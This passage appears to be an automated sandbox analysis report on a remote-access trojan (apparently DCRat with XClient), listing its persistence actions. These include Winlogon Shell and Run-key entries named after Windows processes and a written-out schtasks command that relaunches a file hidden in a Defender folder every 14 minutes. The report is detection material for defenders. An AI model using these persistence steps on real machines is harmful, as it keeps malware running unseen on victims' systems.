Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process information set: NOOPENFILEERRORBOX
